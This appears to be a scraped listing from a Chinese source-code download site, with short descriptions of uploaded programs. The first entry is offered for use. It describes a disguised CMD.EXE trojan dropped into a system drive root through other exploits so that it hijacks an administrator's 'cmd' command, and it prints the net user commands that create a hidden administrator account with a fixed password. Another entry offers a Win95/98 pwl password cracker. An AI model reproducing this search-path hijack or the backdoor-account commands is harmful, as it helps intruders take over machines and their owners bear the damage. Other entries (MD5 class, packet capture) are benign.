-
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
- 2022-06-01 08:01:12下载
- 积分:1
-
提供了一个好用的MD5的C++类;这个类可以加在控制台程序中也可用在MFC中,并且提供了详细的错误处理函数,是一个安全的类。例程是一个MD5的MFC程序,支持字...
提供了一个好用的MD5的C++类;这个类可以加在控制台程序中也可用在MFC中,并且提供了详细的错误处理函数,是一个安全的类。例程是一个MD5的MFC程序,支持字符串和文件两种输入。-provides a user-friendly MD5 C; This category can be added to the Console program is available in MFC, and provided a detailed error handling function, is a safety class. MD5 is a routine MFC procedures, and documentation to support a string of two input.
- 2022-03-20 17:04:06下载
- 积分:1
-
解Win95/98的pwl文件密码的程序
解Win95/98的pwl文件密码的程序 -Cracking pwl files password in win95/98
- 2023-06-01 02:50:03下载
- 积分:1
-
通过IP地址得到计算机名源程序ip
通过IP地址得到计算机名源程序ip-code of getting computer name though ip address
- 2022-05-06 12:18:16下载
- 积分:1
-
枚举Windows NT 2000系统中的命名管道
枚举Windows NT 2000系统中的命名管道-2000 Enumerate Windows NT system of named pipes
- 2022-12-13 00:30:04下载
- 积分:1
-
一套基于IBM Aglet实现的程序,有很大的利用价值,共十几个源程序...
一套基于IBM Aglet实现的程序,有很大的利用价值,共十几个源程序-set based on IBM Aglet achieve procedures, the use of great value, a total of a dozen source
- 2023-08-30 23:05:04下载
- 积分:1
-
一段操作系统的代码
一段操作系统的代码-code about operate system
- 2022-06-30 21:48:52下载
- 积分:1
-
生成自定义字符串序列,可用于规律命名的批量下载。
生成自定义字符串序列,可用于规律命名的批量下载。-generate custom string sequence, the law named for the batch download.
- 2022-07-27 00:04:46下载
- 积分:1
-
内存控制
å†…å˜æŽ§åˆ¶ -Memory control
- 2023-01-14 04:40:03下载
- 积分:1
-
最新的winsock抓包程序,纯外语版的,
最新的winsock抓包程序,纯外语版的,-capturing Packet protocols of the latest procedures, foreign language version of the pure,
- 2022-07-13 13:54:10下载
- 积分:1